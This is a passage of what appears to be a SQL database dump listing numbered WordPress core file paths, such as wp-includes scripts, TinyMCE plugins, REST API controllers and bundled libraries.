yer-legacy.min.css'),(2639,'wp-includes/js/mediaelement/mediaelementplayer.css'),(2640,'wp-includes/js/mediaelement/mediaelementplayer.min.css'),(2641,'wp-includes/js/mediaelement/mejs-controls.png'),(2642,'wp-includes/js/mediaelement/mejs-controls.svg'),(2643,'wp-includes/js/mediaelement/renderers/vimeo.js'),(2644,'wp-includes/js/mediaelement/renderers/vimeo.min.js'),(2645,'wp-includes/js/mediaelement/wp-mediaelement.css'),(2646,'wp-includes/js/mediaelement/wp-mediaelement.js'),(2647,'wp-includes/js/mediaelement/wp-mediaelement.min.css'),(2648,'wp-includes/js/mediaelement/wp-mediaelement.min.js'),(2649,'wp-includes/js/mediaelement/wp-playlist.js'),(2650,'wp-includes/js/mediaelement/wp-playlist.min.js'),(2651,'wp-includes/js/plupload/handlers.js'),(2652,'wp-includes/js/plupload/handlers.min.js'),(2653,'wp-includes/js/plupload/license.txt'),(2654,'wp-includes/js/plupload/moxie.js'),(2655,'wp-includes/js/plupload/moxie.min.js'),(2656,'wp-includes/js/plupload/plupload.js'),(2657,'wp-includes/js/plupload/plupload.min.js'),(2658,'wp-includes/js/plupload/wp-plupload.js'),(2659,'wp-includes/js/plupload/wp-plupload.min.js'),(2660,'wp-includes/js/quicktags.js'),(2661,'wp-includes/js/quicktags.min.js'),(2662,'wp-includes/js/shortcode.js'),(2663,'wp-includes/js/shortcode.min.js'),(2664,'wp-includes/js/swfobject.js'),(2665,'wp-includes/js/swfupload/handlers.js'),(2666,'wp-includes/js/swfupload/handlers.min.js'),(2667,'wp-includes/js/swfupload/license.txt'),(2668,'wp-includes/js/swfupload/swfupload.js'),(2669,'wp-includes/js/thickbox/loadingAnimation.gif'),(2670,'wp-includes/js/thickbox/macFFBgHack.png'),(2671,'wp-includes/js/thickbox/thickbox.css'),(2672,'wp-includes/js/thickbox/thickbox.js'),(2673,'wp-includes/js/tinymce/langs/wp-langs-en.js'),(2674,'wp-includes/js/tinymce/license.txt'),(2675,'wp-includes/js/tinymce/plugins/charmap/plugin.js'),(2676,'wp-includes/js/tinymce/plugins/charmap/plugin.min.js'),(2677,'wp-includes/js/tinymce/plugins/colorpicker/plugin.js'),(2678,'wp-includes/js/tinymce/plugins/colorpicker/plugin.min.js'),(2679,'wp-includes/js/tinymce/plugins/compat3x/css/dialog.css'),(2680,'wp-includes/js/tinymce/plugins/compat3x/plugin.js'),(2681,'wp-includes/js/tinymce/plugins/compat3x/plugin.min.js'),(2682,'wp-includes/js/tinymce/plugins/directionality/plugin.js'),(2683,'wp-includes/js/tinymce/plugins/directionality/plugin.min.js'),(2684,'wp-includes/js/tinymce/plugins/fullscreen/plugin.js'),(2685,'wp-includes/js/tinymce/plugins/fullscreen/plugin.min.js'),(2686,'wp-includes/js/tinymce/plugins/hr/plugin.js'),(2687,'wp-includes/js/tinymce/plugins/hr/plugin.min.js'),(2688,'wp-includes/js/tinymce/plugins/image/plugin.js'),(2689,'wp-includes/js/tinymce/plugins/image/plugin.min.js'),(2690,'wp-includes/js/tinymce/plugins/link/plugin.js'),(2691,'wp-includes/js/tinymce/plugins/link/plugin.min.js'),(2692,'wp-includes/js/tinymce/plugins/lists/plugin.js'),(2693,'wp-includes/js/tinymce/plugins/lists/plugin.min.js'),(2694,'wp-includes/js/tinymce/plugins/media/plugin.js'),(2695,'wp-includes/js/tinymce/plugins/media/plugin.min.js'),(2696,'wp-includes/js/tinymce/plugins/paste/plugin.js'),(2697,'wp-includes/js/tinymce/plugins/paste/plugin.min.js'),(2698,'wp-includes/js/tinymce/plugins/tabfocus/plugin.js'),(2699,'wp-includes/js/tinymce/plugins/tabfocus/plugin.min.js'),(2700,'wp-includes/js/tinymce/plugins/textcolor/plugin.js'),(2701,'wp-includes/js/tinymce/plugins/textcolor/plugin.min.js'),(2702,'wp-includes/js/tinymce/plugins/wordpress/plugin.js'),(2703,'wp-includes/js/tinymce/plugins/wordpress/plugin.min.js'),(2704,'wp-includes/js/tinymce/plugins/wpautoresize/plugin.js'),(2705,'wp-includes/js/tinymce/plugins/wpautoresize/plugin.min.js'),(2706,'wp-includes/js/tinymce/plugins/wpdialogs/plugin.js'),(2707,'wp-includes/js/tinymce/plugins/wpdialogs/plugin.min.js'),(2708,'wp-includes/js/tinymce/plugins/wpeditimage/plugin.js'),(2709,'wp-includes/js/tinymce/plugins/wpeditimage/plugin.min.js'),(2710,'wp-includes/js/tinymce/plugins/wpemoji/plugin.js'),(2711,'wp-includes/js/tinymce/plugins/wpemoji/plugin.min.js'),(2712,'wp-includes/js/tinymce/plugins/wpgallery/plugin.js'),(2713,'wp-includes/js/tinymce/plugins/wpgallery/plugin.min.js'),(2714,'wp-includes/js/tinymce/plugins/wplink/plugin.js'),(2715,'wp-includes/js/tinymce/plugins/wplink/plugin.min.js'),(2716,'wp-includes/js/tinymce/plugins/wptextpattern/plugin.js'),(2717,'wp-includes/js/tinymce/plugins/wptextpattern/plugin.min.js'),(2718,'wp-includes/js/tinymce/plugins/wpview/plugin.js'),(2719,'wp-includes/js/tinymce/plugins/wpview/plugin.min.js'),(2720,'wp-includes/js/tinymce/skins/lightgray/content.inline.min.css'),(2721,'wp-includes/js/tinymce/skins/lightgray/content.min.css'),(2722,'wp-includes/js/tinymce/skins/lightgray/img/anchor.gif'),(2723,'wp-includes/js/tinymce/skins/lightgray/img/loader.gif'),(2724,'wp-includes/js/tinymce/skins/lightgray/img/object.gif'),(2725,'wp-includes/js/tinymce/skins/lightgray/img/trans.gif'),(2726,'wp-includes/js/tinymce/skins/lightgray/skin.min.css'),(2727,'wp-includes/js/tinymce/skins/wordpress/images/audio.png'),(2728,'wp-includes/js/tinymce/skins/wordpress/images/dashicon-edit.png'),(2729,'wp-includes/js/tinymce/skins/wordpress/images/dashicon-no.png'),(2730,'wp-includes/js/tinymce/skins/wordpress/images/embedded.png'),(2731,'wp-includes/js/tinymce/skins/wordpress/images/gallery-2x.png'),(2732,'wp-includes/js/tinymce/skins/wordpress/images/gallery.png'),(2733,'wp-includes/js/tinymce/skins/wordpress/images/more-2x.png'),(2734,'wp-includes/js/tinymce/skins/wordpress/images/more.png'),(2735,'wp-includes/js/tinymce/skins/wordpress/images/pagebreak-2x.png'),(2736,'wp-includes/js/tinymce/skins/wordpress/images/pagebreak.png'),(2737,'wp-includes/js/tinymce/skins/wordpress/images/playlist-audio.png'),(2738,'wp-includes/js/tinymce/skins/wordpress/images/playlist-video.png'),(2739,'wp-includes/js/tinymce/skins/wordpress/images/video.png'),(2740,'wp-includes/js/tinymce/skins/wordpress/wp-content.css'),(2741,'wp-includes/js/tinymce/themes/inlite/theme.js'),(2742,'wp-includes/js/tinymce/themes/inlite/theme.min.js'),(2743,'wp-includes/js/tinymce/themes/modern/theme.js'),(2744,'wp-includes/js/tinymce/themes/modern/theme.min.js'),(2745,'wp-includes/js/tinymce/tiny_mce_popup.js'),(2746,'wp-includes/js/tinymce/tinymce.min.js'),(2747,'wp-includes/js/tinymce/utils/editable_selects.js'),(2748,'wp-includes/js/tinymce/utils/form_utils.js'),(2749,'wp-includes/js/tinymce/utils/mctabs.js'),(2750,'wp-includes/js/tinymce/utils/validate.js'),(2751,'wp-includes/js/tinymce/wp-tinymce.js'),(2752,'wp-includes/js/tinymce/wp-tinymce.php'),(2753,'wp-includes/js/tw-sack.js'),(2754,'wp-includes/js/tw-sack.min.js'),(2755,'wp-includes/js/twemoji.js'),(2756,'wp-includes/js/twemoji.min.js'),(2757,'wp-includes/js/underscore.js'),(2758,'wp-includes/js/underscore.min.js'),(2759,'wp-includes/js/utils.js'),(2760,'wp-includes/js/utils.min.js'),(2761,'wp-includes/js/wp-ajax-response.js'),(2762,'wp-includes/js/wp-ajax-response.min.js'),(2763,'wp-includes/js/wp-api.js'),(2764,'wp-includes/js/wp-api.min.js'),(2765,'wp-includes/js/wp-auth-check.js'),(2766,'wp-includes/js/wp-auth-check.min.js'),(2767,'wp-includes/js/wp-backbone.js'),(2768,'wp-includes/js/wp-backbone.min.js'),(2769,'wp-includes/js/wp-custom-header.js'),(2770,'wp-includes/js/wp-custom-header.min.js'),(2771,'wp-includes/js/wp-embed-template.js'),(2772,'wp-includes/js/wp-embed-template.min.js'),(2773,'wp-includes/js/wp-embed.js'),(2774,'wp-includes/js/wp-embed.min.js'),(2775,'wp-includes/js/wp-emoji-loader.js'),(2776,'wp-includes/js/wp-emoji-loader.min.js'),(2777,'wp-includes/js/wp-emoji-release.min.js'),(2778,'wp-includes/js/wp-emoji.js'),(2779,'wp-includes/js/wp-emoji.min.js'),(2780,'wp-includes/js/wp-list-revisions.js'),(2781,'wp-includes/js/wp-list-revisions.min.js'),(2782,'wp-includes/js/wp-lists.js'),(2783,'wp-includes/js/wp-lists.min.js'),(2784,'wp-includes/js/wp-pointer.js'),(2785,'wp-includes/js/wp-pointer.min.js'),(2786,'wp-includes/js/wp-sanitize.js'),(2787,'wp-includes/js/wp-sanitize.min.js'),(2788,'wp-includes/js/wp-util.js'),(2789,'wp-includes/js/wp-util.min.js'),(2790,'wp-includes/js/wpdialog.js'),(2791,'wp-includes/js/wpdialog.min.js'),(2792,'wp-includes/js/wplink.js'),(2793,'wp-includes/js/wplink.min.js'),(2794,'wp-includes/js/zxcvbn-async.js'),(2795,'wp-includes/js/zxcvbn-async.min.js'),(2796,'wp-includes/js/zxcvbn.min.js'),(2797,'wp-includes/kses.php'),(2798,'wp-includes/l10n.php'),(2799,'wp-includes/link-template.php'),(2800,'wp-includes/load.php'),(2801,'wp-includes/locale.php'),(2802,'wp-includes/media-template.php'),(2803,'wp-includes/media.php'),(2804,'wp-includes/meta.php'),(2805,'wp-includes/ms-blogs.php'),(2806,'wp-includes/ms-default-constants.php'),(2807,'wp-includes/ms-default-filters.php'),(2808,'wp-includes/ms-deprecated.php'),(2809,'wp-includes/ms-files.php'),(2810,'wp-includes/ms-functions.php'),(2811,'wp-includes/ms-load.php'),(2812,'wp-includes/ms-network.php'),(2813,'wp-includes/ms-settings.php'),(2814,'wp-includes/ms-site.php'),(2815,'wp-includes/nav-menu-template.php'),(2816,'wp-includes/nav-menu.php'),(2817,'wp-includes/option.php'),(2818,'wp-includes/pluggable-deprecated.php'),(2819,'wp-includes/pluggable.php'),(2820,'wp-includes/plugin.php'),(2821,'wp-includes/pomo/entry.php'),(2822,'wp-includes/pomo/mo.php'),(2823,'wp-includes/pomo/plural-forms.php'),(2824,'wp-includes/pomo/po.php'),(2825,'wp-includes/pomo/streams.php'),(2826,'wp-includes/pomo/translations.php'),(2827,'wp-includes/post-formats.php'),(2828,'wp-includes/post-template.php'),(2829,'wp-includes/post-thumbnail-template.php'),(2830,'wp-includes/post.php'),(2831,'wp-includes/query.php'),(2832,'wp-includes/random_compat/byte_safe_strings.php'),(2833,'wp-includes/random_compat/cast_to_int.php'),(2834,'wp-includes/random_compat/error_polyfill.php'),(2835,'wp-includes/random_compat/random.php'),(2836,'wp-includes/random_compat/random_bytes_com_dotnet.php'),(2837,'wp-includes/random_compat/random_bytes_dev_urandom.php'),(2838,'wp-includes/random_compat/random_bytes_libsodium.php'),(2839,'wp-includes/random_compat/random_bytes_libsodium_legacy.php'),(2840,'wp-includes/random_compat/random_bytes_mcrypt.php'),(2841,'wp-includes/random_compat/random_int.php'),(2842,'wp-includes/registration-functions.php'),(2843,'wp-includes/registration.php'),(2844,'wp-includes/rest-api/class-wp-rest-request.php'),(2845,'wp-includes/rest-api/class-wp-rest-response.php'),(2846,'wp-includes/rest-api/class-wp-rest-server.php'),(2847,'wp-includes/rest-api/endpoints/class-wp-rest-application-passwords-controller.php'),(2848,'wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php'),(2849,'wp-includes/rest-api/endpoints/class-wp-rest-autosaves-controller.php'),(2850,'wp-includes/rest-api/endpoints/class-wp-rest-block-directory-controller.php'),(2851,'wp-includes/rest-api/endpoints/class-wp-rest-block-renderer-controller.php'),(2852,'wp-includes/rest-api/endpoints/class-wp-rest-block-types-controller.php'),(2853,'wp-includes/rest-api/endpoints/class-wp-rest-blocks-controller.php'),(2854,'wp-includes/rest-api/endpoints/class-wp-rest-comments-controller.php'),(2855,'wp-includes/rest-api/endpoints/class-wp-rest-controller.php'),(2856,'wp-includes/rest-api/endpoints/class-wp-rest-plugins-controller.php'),(2857,'wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php'),(2858,'wp-includes/rest-api/endpoints/class-wp-rest-post-types-controller.php'),(2859,'wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php'),(2860,'wp-includes/rest-api/endpoints/class-wp-rest-revisions-controller.php'),(2861,'wp-includes/rest-api/endpoints/class-wp-rest-search-controller.php'),(2862,'wp-includes/rest-api/endpoints/class-wp-rest-settings-controller.php'),(2863,'wp-includes/rest-api/endpoints/class-wp-rest-site-health-controller.php'),(2864,'wp-includes/rest-api/endpoints/class-wp-rest-taxonomies-controller.php'),(2865,'wp-includes/rest-api/endpoints/class-wp-rest-terms-controller.php'),(2866,'wp-includes/rest-api/endpoints/class-wp-rest-themes-controller.php'),(2867,'wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php'),(2868,'wp-includes/rest-api/fields/class-wp-rest-comment-meta-fields.php'),(2869,'wp-includes/rest-api/fields/class-wp-rest-meta-fields.php'),(2870,'wp-includes/rest-api/fields/class-wp-rest-post-meta-fields.php'),(2871,'wp-includes/rest-api/fields/class-wp-rest-term-meta-fields.php'),(2872,'wp-includes/rest-api/fields/class-wp-rest-user-meta-fields.php'),(2873,'wp-includes/rest-api/search/class-wp-rest-post-format-search-handler.php'),(2874,'wp-includes/rest-api/search/class-wp-rest-post-search-handler.php'),(2875,'wp-includes/rest-api/search/class-wp-rest-search-handler.php'),(2876,'wp-includes/rest-api/search/class-wp-rest-term-search-handler.php'),(2877,'wp-includes/rest-api.php'),(2878,'wp-includes/revision.php'),(2879,'wp-includes/rewrite.php'),(2880,'wp-includes/robots-template.php'),(2881,'wp-includes/rss-functions.php'),(2882,'wp-includes/rss.php'),(2883,'wp-includes/script-loader.php'),(2884,'wp-includes/session.php'),(2885,'wp-includes/shortcodes.php'),(2886,'wp-includes/sitemaps/class-wp-sitemaps-index.php'),(2887,'wp-includes/sitemaps/class-wp-sitemaps-provider.php'),(2888,'wp-includes/sitemaps/class-wp-sitemaps-registry.php'),(2889,'wp-includes/sitemaps/class-wp-sitemaps-renderer.php'),(2890,'wp-includes/sitemaps/class-wp-sitemaps-stylesheet.php'),(2891,'wp-includes/sitemaps/class-wp-sitemaps.php'),(2892,'wp-includes/sitemaps/providers/class-wp-sitemaps-posts.php'),(2893,'wp-includes/sitemaps/providers/class-wp-sitemaps-taxonomies.php'),(2894,'wp-includes/sitemaps/providers/class-wp-sitemaps-users.php'),(2895,'wp-includes/sitemaps.php'),(2896,'wp-includes/sodium_compat/LICENSE'),(2897,'wp-includes/sodium_compat/autoload-php7.php'),(2898,'wp-includes/sodium_compat/autoload.php'),(2899,'wp-includes/sodium_compat/composer.json'),(2900,'wp-includes/sodium_compat/lib/constants.php'),(2901,'wp-includes/sodium_compat/lib/namespaced.php'),(2902,'wp-includes/sodium_compat/lib/php72compat.php'),(2903,'wp-includes/sodium_compat/lib/php72compat_const.php'),(2904,'wp-includes/sodium_compat/lib/ristretto255.php'),(2905,'wp-includes/sodium_compat/lib/sodium_compat.php'),(2906,'wp-includes/sodium_compat/lib/stream-xchacha20.php'),(2907,'wp-includes/sodium_compat/namespaced/Compat.php'),(2908,'wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php'),(2909,'wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php'),(2910,'wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php'),(2911,'wp-includes/sodium_compat/namespaced/Core/ChaCha20.php'),(2912,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php'),(2913,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php'),(2914,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php'),(2915,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php'),(2916,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php'),(2917,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php'),(2918,'wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php'),(2919,'wp-includes/sodium_compat/namespaced/Core/Curve25519.php'),(2920,'wp-includes/sodium_compat/namespaced/Core/Ed25519.php'),(2921,'wp-includes/sodium_compat/namespaced/Core/HChaCha20.php'),(2922,'wp-includes/sodium_compat/namespaced/Core/HSalsa20.php'),(2923,'wp-includes/sodium_compat/namespaced/Core/Poly1305/State.php'),(2924,'wp-includes/sodium_compat/namespaced/Core/Poly1305.php'),(2925,'wp-includes/sodium_compat/namespaced/Core/Salsa20.php'),(2926,'wp-includes/sodium_compat/namespaced/Core/SipHash.php'),(2927,'wp-includes/sodium_compat/namespaced/Core/Util.php'),(2928,'wp-includes/sodium_compat/namespaced/Core/X25519.php'),(2929,'wp-includes/sodium_compat/namespaced/Core/XChaCha20.php'),(2930,'wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php'),(2931,'wp-includes/sodium_compat/namespaced/Crypto.php'),(2932,'wp-includes/sodium_compat/namespaced/File.php'),(2933,'wp-includes/sodium_compat/src/Compat.php'),(2934,'wp-includes/sodium_compat/src/Core/BLAKE2b.php'),(2935,'wp-includes/sodium_compat/src/Core/Base64/Common.php'),(2936,'wp-includes/sodium_compat/src/Core/Base64/Original.php'),(2937,'wp-includes/sodium_compat/src/Core/Base64/UrlSafe.php'),(2938,'wp-includes/sodium_compat/src/Core/ChaCha20/Ctx.php'),(2939,'wp-includes/sodium_compat/src/Core/ChaCha20/IetfCtx.php'),(2940,'wp-includes/sodium_compat/src/Core/ChaCha20.php'),(2941,'wp-includes/sodium_compat/src/Core/Curve25519/Fe.php'),(2942,'wp-includes/sodium_compat/src/Core/Curve25519/Ge/Cached.php'),(2943,'wp-includes/sodium_compat/src/Core/Curve25519/Ge/P1p1.php'),(2944,'wp-includes/sodium_compat/src/Core/Curve25519/Ge/P2.php'),(2945,'wp-includes/sodium_compat/src/Core/Curve25519/Ge/P3.php'),(2946,'wp-includes/sodium_compat/src/Core/Curve25519/Ge/Precomp.php'),(2947,'wp-includes/sodium_compat/src/Core/Curve25519/H.php'),(2948,'wp-includes/sodium_compat/src/Core/Curve25519/README.md'),(2949,'wp-includes/sodium_compat/src/Core/Curve25519.php'),(2950,'wp-includes/sodium_compat/src/Core/Ed25519.php'),(2951,'wp-includes/sodium_compat/src/Core/HChaCha20.php'),(2952,'wp-includes/sodium_compat/src/Core/HSalsa20.php'),(2953,'wp-includes/sodium_compat/src/Core/Poly1305/State.php'),(2954,'wp-includes/sodium_compat/src/Core/Poly1305.php'),(2955,'wp-includes/sodium_compat/src/Core/Ristretto255.php'),(2956,'wp-includes/sodium_compat/src/Core/Salsa20.php'),(2957,'wp-includes/sodium_compat/src/Core/SecretStream/State.php'),(2958,'wp-includes/sodium_compat/src/Core/SipHash.php'),(2959,'wp-includes/sodium_compat/src/Core/Util.php'),(2960,'wp-includes/sodium_compat/src/Core/X25519.php'),(2961,'wp-includes/sodium_compat/src/Core/XChaCha20.php'),(2962,'wp-includes/sodium_compat/src/Core/XSalsa20.php'),(2963,'wp-includes/sodium_compat/src/Core32/BLAKE2b.php'),(2964,'wp-includes/sodium_compat/src/Core32/ChaCha20/Ctx.php'),(2965,'wp-includes/sodium_compat/src/Core32/ChaCha20/IetfCtx.php'),(2966,'wp-includes/sodium_compat/src/Core32/ChaCha20.php'),(2967,'wp-includes/sodium_compat/src/Core32/Curve25519/Fe.php'),(2968,'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Cached.php'),(2969,'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php'),(2970,'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P2.php'),(2971,'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P3.php'),(2972,'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php'),(2973,'wp-includes/sodium_compat/src/Core32/Curve25519/H.php'),(2974,'wp-includes/sodium_compat/src/Core32/Curve25519/README.md'),(2975,'wp-includes/sodium_compat/src/Core32/Curve25519.php'),(2976,'wp-includes/sodium_compat/src/Core32/Ed25519.php'),(2977,'wp-includes/sodium_compat/src/Core32/HChaCha20.php'),(2978,'wp-includes/sodium_compat/src/Core32/HSalsa20.php'),(2979,'wp-includes/sodium_compat/src/Core32/Int32.php'),(2980,'wp-includes/sodium_compat/src/Core32/Int64.php'),(2981,'wp-includes/sodium_compat/src/Core32/Poly1305/State.php'),(2982,'wp-includes/sodium_compat/src/Core32/Poly1305.php'),(2983,'wp-includes/sodium_compat/src/Core32/Salsa20.php'),(2984,'wp-includes/sodium_compat/src/Core32/SecretStream/State.php'),(2985,'wp-includes/sodium_compat/src/Core32/SipHash.php'),(2986,'wp-includes/sodium_compat/src/Core32/Util.php'),(2987,'wp-includes/sodium_compat/src/Core32/X25519.php'),(2988,'wp-includes/sodium_compat/src/Core32/XChaCha20.php'),(2989,'wp-includes/sodium_compat/src/Core32/XSalsa20.php'),(2990,'wp-includes/sodium_compat/src/Crypto.php'),(2991,'wp-includes/sodium_compat/src/Crypto32.php'),(2992,'wp-includes/sodium_compat/src/File.php'),(2993,'wp-includes/sodium_compat/src/PHP52/SplFixedArray.php'),(2994,'wp-includes/sodium_compat/src/SodiumException.php'),(2995,'wp-includes/spl-autoload-compat.php'),(2996,'wp-includes/taxonomy.php'),(2997,'wp-includes/template-loader.php'),(2998,'wp-includes/template.php'),(2999,'wp-includes/theme-compat/comments.php'),(3000,'wp-includes/theme-compat/embed-404.php'),(3001,'wp-includes/theme-compat/embed-content.php'),(3002,'wp-includes/theme-compat/embed.php'),(3003,'wp-includes/theme-compat/footer-embed.php'),(3004,'wp-includes/theme-compat/footer.php'),(3005,'wp-includes/theme-compat/header-embed.php'),(3006,'wp-includes/theme-compat/header.php'),(3007,'wp-includes/theme-compat/sidebar.php'),(3008,'wp-includes/theme.php'),(3009,'wp-includes/update.php'),(3010,'wp-includes/user.php'),(3011,'wp-includes/vars.php'),(3012,'wp-includes/version.php'),(3013,'wp-includes/widgets/class-wp-nav-menu-widget.php'),(3014,'wp-includes/widgets/class-wp-widget-archives.php'),(3015,'wp-includes/widgets/class-wp-widget-calendar.php'),(3016,'wp-includes/widgets/class-wp-widget-categories.php'),(3017,'wp-includes/widgets/class-wp-widget-custom-html.php'),(3018,'wp-includes/widgets/class-wp-widget-links.php'),(3019,'wp-includes/widgets/class-wp-widget-media-audio.php'),(3020,'wp-includes/widgets/class-wp-widget-media-gallery.php'),(3021,'wp-includes/widgets/class-wp-widget-media-image.php'),(3022,'wp-includes/widgets/class-wp-widget-media-video.php'),(3023,'wp-includes/widgets/class-wp-widget-media.php'),(3024,'wp-includes/widgets/class-wp-widget-meta.php'),(3025,'wp-includes/widgets/class-wp-widget-pages.php'),(3026,'wp-includes/widgets/class-wp-widget-recent-comments.php'),(3027,'wp-includes/widgets/class-wp-widget-recent-posts.php'),(3028,'wp-includes/widgets/class-wp-widget-rss.php'),(3029,'wp-includes/widgets/class-wp-widget-search.php'),(3030,'wp-includes/widgets/class-wp-widget-tag-cloud.php'),(3031,'wp-includes/widgets/class-wp-widget-text.php'),(3032,'wp-includes/widgets.php'),(3033,'wp-includes/wlwmanifest.xml'),(3034,'wp-includes/wp-db.php'),(3035,'wp-includes/wp-diff.php'),(3036,'wp-includes/wp-includes/ID3/getid3.lib.php'),(3037,'wp-includes/wp-includes/ID3/getid3.php'),(3038,'wp-includes/wp-includes/ID3/license.commercial.txt'),(3039,'wp-includes/wp-includes/ID3/license.txt'),(3040,'wp-includes/wp-includes/ID3/module.audio-video.asf.php'),(3041,'wp-includes/wp-includes/ID3/module.audio-video.flv.php'),(3042,'wp-includes/wp-includes/ID3/module.audio-video.matroska.php'),(3043,'wp-includes/wp-includes/ID3/module.audio-video.quicktime.php'),(3044,'wp-includes/wp-includes/ID3/module.audio-video.riff.php'),(3045,'wp-includes/wp-includes/ID3/module.audio.ac3.php'),(3046,'wp-includes/wp-includes/ID3/module.audio.dts.php'),(3047,'wp-includes/wp-includes/ID3/module.audio.flac.php'),(3048,'wp-includes/wp-includes/ID3/module.audio.mp3.php'),(3049,'wp-includes/wp-includes/ID3/module.audio.ogg.php'),(3050,'wp-includes/wp-includes/ID3/module.tag.apetag.php'),(3051,'wp-includes/wp-includes/ID3/module.tag.id3v1.php'),(3052,'wp-includes/wp-includes/ID3/module.tag.id3v2.php'),(3053,'wp-includes/wp-includes/ID3/module.tag.lyrics3.php'),(3054,'wp-includes/wp-includes/ID3/readme.txt'),(3055,'wp-includes/wp-includes/IXR/class-IXR-base64.php'),(3056,'wp-includes/wp-includes/IXR/class-IXR-client.php'),(3057,'wp-includes/wp-includes/IXR/class-IXR-clientmulticall.php'),(3058,'wp-includes/wp-includes/IXR/class-IXR-date.php'),(3059,'wp-includes/wp-includes/IXR/class-IXR-error.php'),(3060,'wp-includes/wp-includes/IXR/class-IXR-introspectionserver.php'),(3061,'wp-includes/wp-includes/IXR/class-IXR-message.php'),(3062,'wp-includes/wp-includes/IXR/class-IXR-request.php'),(3063,'wp-includes/wp-includes/IXR/class-IXR-server.php'),(3064,'wp-includes/wp-includes/IXR/class-IXR-value.php'),(3065,'wp-includes/wp-includes/PHPMailer/Exception.php'),(3066,'wp-includes/wp-includes/PHPMailer/PHPMailer.php'),(3067,'wp-includes/wp-includes/PHPMailer/SMTP.php'),(3068,'wp-includes/wp-includes/Requests/Auth/Basic.php'),(3069,'wp-includes/wp-includes/Requests/Auth.php'),(3070,'wp-includes/wp-includes/Requests/Cookie/Jar.php'),(3071,'wp-includes/wp-includes/Requests/Cookie.php'),(3072,'wp-includes/wp-includes/Requests/Exception/HTTP/304.php'),(3073,'wp-includes/wp-includes/Requests/Exception/HTTP/305.php'),(3074,'wp-includes/wp-includes/Requests/Exception/HTTP/306.php'),(3075,'wp-includes/wp-includes/Requests/Exception/HTTP/400.php'),(3076,'wp-includes/wp-includes/Requests/Exception/HTTP/401.php'),(3077,'wp-includes/wp-includes/Requests/Exception/HTTP/402.php'),(3078,'wp-includes/wp-includes/Requests/Exception/HTTP/403.php'),(3079,'wp-includes/wp-includes/Requests/Exception/HTTP/404.php'),(3080,'wp-includes/wp-includes/Requests/Exception/HTTP/405.php'),(3081,'wp-includes/wp-includes/Requests/Exception/HTTP/406.php'),(3082,'wp-includes/wp-includes/Requests/Exception/HTTP/407.php'),(3083,'wp-includes/wp-includes/Requests/Exception/HTTP/408.php'),(3084,'wp-includes/wp-includes/Requests/Exception/HTTP/409.php'),(3085,'wp-includes/wp-includes/Requests/Exception/HTTP/410.php'),(3086,'wp-includes/wp-includes/Requests/Exception/HTTP/411.php'),(3087,'wp-includes/wp-includes/Requests/Exception/HTTP/412.php'),(3088,'wp-includes/wp-includes/Requests/Exception/HTTP/413.php'),(3089,'wp-includes/wp-includes/Requests/Exception/HTTP/414.php'),(3090,'wp-includes/wp-includes/Requests/Exception/HTTP/415.php'),(3091,'wp-includes/wp-includes/Requests/Exception/HTTP/416.php'),(3092,'wp-includes/wp-includes/Requests/Exception/HTTP/417.php'),(3093,'wp-includes/wp-includes/Requests/Exception/HTTP/418.php'),(3094,'wp-includes/wp-includes/Requests/Exception/HTTP/428.php'),(3095,'wp-includes/wp-includes/Requests/Exception/HTTP/429.php'),(3096,'wp-includes/wp-includes/Requests/Exception/HTTP/431.php'),(3097,'wp-includes/wp-includes/Requests/Exception/HTTP/500.php'),(3098,'wp-includes/wp-includes/Requests/Exception/HTTP/501.php'),(3099,'wp-includes/wp-includes/Requests/Exception/HTTP/502.php'),(3100,'wp-includes/wp-includes/Requests/Exception/HTTP/503.php'),(3101,'wp-includes/wp-includes/Requests/Exception/HTTP/504.php'),(3102,'wp-includes/wp-includes/Requests/Exception/HTTP/505.php'),(3103,'wp-includes/wp-includes/Requests/Exception/HTTP/511.php'),(3104,'wp-includes/wp-includes/Requests/Exception/HTTP/Unknown.php'),(3105,'wp-includes/wp-includes/Requests/Exception/HTTP.php'),(3106,'wp-includes/wp-includes/Requests/Exception/Transport/cURL.php'),(3107,'wp-includes/wp-includes/Requests/Exception/Transport.php'),(3108,'wp-includes/wp-includes/Requests/Exception.php'),(3109,'wp-includes/wp-includes/Requests/Hooker.php'),(3110,'wp-includes/wp-includes/Requests/Hooks.php'),(3111,'wp-includes/wp-includes/Requests/IDNAEncoder.php'),(3112,'wp-includes/wp-includes/Requests/IPv6.php'),(3113,'wp-includes/wp-includes/Requests/IRI.php'),(3114,'wp-includes/wp-includes/Requests/Proxy/HTTP.php'),(3115,'wp-includes/wp-includes/Requests/Proxy.php'),(3116,'wp-includes/wp-includes/Requests/Response/Headers.php'),(3117,'wp-includes/wp-includes/Requests/Response.php'),(3118,'wp-includes/wp-includes/Requests/SSL.php'),(3119,'wp-includes/wp-includes/Requests/Session.php'),(3120,'wp-includes/wp-includes/Requests/Transport/cURL.php'),(3121,'wp-includes/wp-includes/Requests/Transport/fsockopen.php'),(3122,'wp-includes/wp-includes/Requests/Transport.php'),(3123,'wp-includes/wp-includes/Requests/Utility/CaseInsensitiveDictionary.php'),(3124,'wp-includes/wp-includes/Requests/Utility/FilteredIterator.php'),(3125,'wp-includes/wp-includes/SimplePie/Author.php'),(3126,'wp-includes/wp-includes/SimplePie/Cache/Base.php'),(3127,'wp-includes/wp-includes/SimplePie/Cache/DB.php'),(3128,'wp-includes/wp-includes/SimplePie/Cache/File.php'),(3129,'wp-includes/wp-includes/SimplePie/Cache/Memcache.php'),(3130,'wp-